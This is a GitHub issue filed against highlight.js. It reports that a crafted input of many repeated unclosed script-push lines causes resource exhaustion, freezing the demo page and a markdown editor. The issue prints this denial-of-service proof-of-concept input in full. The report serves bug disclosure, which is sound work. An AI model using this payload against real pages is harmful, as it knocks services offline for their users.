Resource exhaustion · Issue #4261 · highlightjs/highlight.js · GitHub

Resource exhaustion #4261
Open
@ErazerBrecht

Description

Describe the issue/behavior that seems buggy
While testing our code, we found that we could make our 'markdown editor' crash.
After some additional research, I found that the highlighting caused it.

I also decided to test the POC on the demo page of highlight.js, and there it also uses a lot of resources.
The browser will eventually show the 'This page isn't responding' pop-up.

Sample Code or Instructions to Reproduce

<body>
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
</body>

Expected behavior
Page doesn't crash

Additional context
I submitted this to security@highlightjs.org, but didn't get any response.
This can be used to impact the availability of a webpage.
